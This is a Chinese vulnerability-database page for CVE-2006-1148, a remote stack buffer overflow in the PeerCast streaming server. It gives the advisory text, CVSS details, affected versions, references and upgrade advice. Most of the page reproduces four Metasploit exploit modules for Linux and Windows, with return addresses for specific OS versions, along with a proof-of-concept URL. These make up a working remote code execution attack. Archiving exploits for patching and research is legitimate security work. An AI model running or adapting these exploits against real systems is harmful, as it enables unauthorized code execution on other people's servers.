CVE-2006-1148
CVSS7.5
发布时间 :2006-03-10 06:02:00
修订时间 :2011-09-06 00:00:00
NMCOEPS    

[原文]Multiple stack-based buffer overflows in the procConnectArgs function in servmgr.cpp in PeerCast before 0.1217 allow remote attackers to execute arbitrary code via an HTTP GET request with a long (1) parameter name or (2) value in a URL, which triggers the overflow in the nextCGIarg function in servhs.cpp.


[CNNVD]Peercast.org PeerCast URL处理远程缓冲区溢出漏洞(CNNVD-200603-197)

        PeerCast是一款简单易用的音频/视频流媒体服务器。
        PeerCast的URL处理代码中的servmgr.cpp中的procConnectArgs函数中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:peercast:peercast:0.1212
cpe:/a:peercast:peercast:0.1215
cpe:/a:peercast:peercast:0.1211

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1148
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1148
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-197
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/17040
(PATCH)  BID  17040
http://www.securityfocus.com/archive/1/archive/1/427160/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060309 INFIGO-2006-03-01: PeerCast streaming server remote buffer overflow
http://www.infigo.hr/in_focus/INFIGO-2006-03-01
(VENDOR_ADVISORY)  MISC  http://www.infigo.hr/in_focus/INFIGO-2006-03-01
http://xforce.iss.net/xforce/xfdb/25113
(UNKNOWN)  XF  peercast-url-bo(25113)
http://www.vupen.com/english/advisories/2006/0900
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0900
http://www.peercast.org/forum/viewtopic.php?t=3346
(UNKNOWN)  CONFIRM  http://www.peercast.org/forum/viewtopic.php?t=3346
http://www.osvdb.org/23777
(UNKNOWN)  OSVDB  23777
http://security.gentoo.org/glsa/glsa-200603-17.xml
(UNKNOWN)  GENTOO  GLSA-200603-17
http://secunia.com/advisories/19291
(VENDOR_ADVISORY)  SECUNIA  19291
http://secunia.com/advisories/19169
(UNKNOWN)  SECUNIA  19169

- 漏洞信息

Peercast.org PeerCast URL处理远程缓冲区溢出漏洞
高危 缓冲区溢出
2006-03-10 00:00:00 2012-12-26 00:00:00
远程  
        PeerCast是一款简单易用的音频/视频流媒体服务器。
        PeerCast的URL处理代码中的servmgr.cpp中的procConnectArgs函数中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        peercast.org PeerCast v0.1217
        http://www.peercast.org/download.php

- 漏洞信息 (10027)

PeerCast <= 0.1216 (EDBID:10027)
linux remote
2006-03-08 Verified
7144 MC
N/A [点击下载]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)',
			'Description'    => %q{
				This module exploits a stack overflow in PeerCast <= v0.1216. 
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
					
			},
			'Author'         => [ 'MC' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-1148'],
	  				['OSVDB', '23777'],
					['BID', '17040'],
					['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 200,
					'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
					'MinNops'  => 64,
				},
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Targets'        => 
				[
					['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],
				],
			'DisclosureDate' => 'Mar 8 2006'))
			
			register_options( [ Opt::RPORT(7144) ], self.class )
	end

	def exploit
		connect
		
		pat = rand_text_alphanumeric(780)
		pat << [target.ret].pack('V')
		pat << payload.encoded

		uri = '/stream/?' + pat
		
		res = "GET #{uri} HTTP/1.0\r\n\r\n"
		
		print_status("Trying target address 0x%.8x..." % target.ret)
		sock.put(res)
		
		handler
		disconnect
	end

end
		

- 漏洞信息 (16786)

PeerCast <= 0.1216 URL Handling Buffer Overflow (win32) (EDBID:16786)
windows remote
2010-09-20 Verified
7144 metasploit
N/A [点击下载]
##
# $Id: peercast_url.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)',
			'Description'    => %q{
					This module exploits a stack buffer overflow in PeerCast <= v0.1216.
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-1148'],
					['OSVDB', '23777'],
					['BID', '17040'],
					['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
					['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
					['Windows XP English SP0/SP1',   { 'Ret' => 0x77dbfa2c }],
					['Windows XP English SP0/SP2',   { 'Ret' => 0x77dc12b8 }],
				],
			'DisclosureDate' => 'Mar 8 2006'))

		register_options( [ Opt::RPORT(7144) ], self.class )
	end

	def exploit
		connect

		pat = rand_text_alphanumeric(1024)
		pat[768, 4] = [target.ret].pack('V')
		pat[812, 5] = [0xe9, -517].pack('CV')
		pat[300, payload.encoded.length] = payload.encoded

		uri = '/stream/?' + pat

		res = "GET #{uri} HTTP/1.0\r\n\r\n"

		print_status("Trying target address 0x%.8x..." % target.ret)
		sock.put(res)
		sock.close

		handler
		disconnect
	end

end
		

- 漏洞信息 (16855)

PeerCast <= 0.1216 URL Handling Buffer Overflow (linux) (EDBID:16855)
linux remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: peercast_url.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)',
			'Description'    => %q{
					This module exploits a stack buffer overflow in PeerCast <= v0.1216.
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
			},
			'Author'         => [ 'MC' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-1148'],
					['OSVDB', '23777'],
					['BID', '17040'],
					['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 200,
					'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
					'MinNops'  => 64,
				},
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Targets'        =>
				[
					['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],
				],
			'DisclosureDate' => 'Mar 8 2006'))

		register_options([
			Opt::RPORT(7144)
		], self.class)
	end

	def exploit
		connect

		pat = rand_text_alphanumeric(780)
		pat << [target.ret].pack('V')
		pat << payload.encoded

		uri = '/stream/?' + pat

		res = "GET #{uri} HTTP/1.0\r\n\r\n"

		print_status("Trying target address 0x%.8x..." % target.ret)
		sock.put(res)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F82238)

PeerCast 0.1216 Buffer Overflow (PacketStormID:F82238)
2009-10-27 00:00:00
MC  
exploit,overflow
CVE-2006-1148
[点击下载]

This Metasploit module exploits a stack overflow in PeerCast versions 0.1216 and below. The vulnerability is caused due to a boundary error within the handling of URL parameters.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)',
			'Description'    => %q{
				This module exploits a stack overflow in PeerCast <= v0.1216. 
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
					
			},
			'Author'         => [ 'MC' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-1148'],
	  				['OSVDB', '23777'],
					['BID', '17040'],
					['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 200,
					'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
					'MinNops'  => 64,
				},
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Targets'        => 
				[
					['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],
				],
			'DisclosureDate' => 'Mar 8 2006'))
			
			register_options( [ Opt::RPORT(7144) ], self.class )
	end

	def exploit
		connect
		
		pat = rand_text_alphanumeric(780)
		pat << [target.ret].pack('V')
		pat << payload.encoded

		uri = '/stream/?' + pat
		
		res = "GET #{uri} HTTP/1.0\r\n\r\n"
		
		print_status("Trying target address 0x%.8x..." % target.ret)
		sock.put(res)
		
		handler
		disconnect
	end

end

    

- 漏洞信息

23777
PeerCast procConnectArgs() Function URL Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-03-09 Unknow
2006-03-11 Unknow

- 解决方案

Upgrade to version 0.1217 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Peercast.org PeerCast Remote Buffer Overflow Vulnerability
Boundary Condition Error 17040
Yes No
2006-03-09 12:00:00 2009-04-21 06:46:00
Discovered by infocus <infocus@infigo.hr>.

- 受影响的程序版本

peercast.org PeerCast 0.1212
peercast.org PeerCast 0.1211
peercast.org PeerCast 0.1215
Gentoo Linux
peercast.org PeerCast 0.1217

- 不受影响的程序版本

peercast.org PeerCast 0.1217

- 漏洞讨论

PeerCast is prone to a remote buffer-overflow vulnerability. A remote attacker could exploit this issue to execute arbitrary code.

PeerCast 0.1215 and earlier are vulnerable.

- 漏洞利用

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A proof of concept is available:

http://www.example.com/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800)

Sample exploit code has been provided:

- 解决方案

The vendor has released PeerCast 0.1217 to address this issue. Please see the referenced advisories for more information and fixes.


peercast.org PeerCast 0.1215

peercast.org PeerCast 0.1211

peercast.org PeerCast 0.1212

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站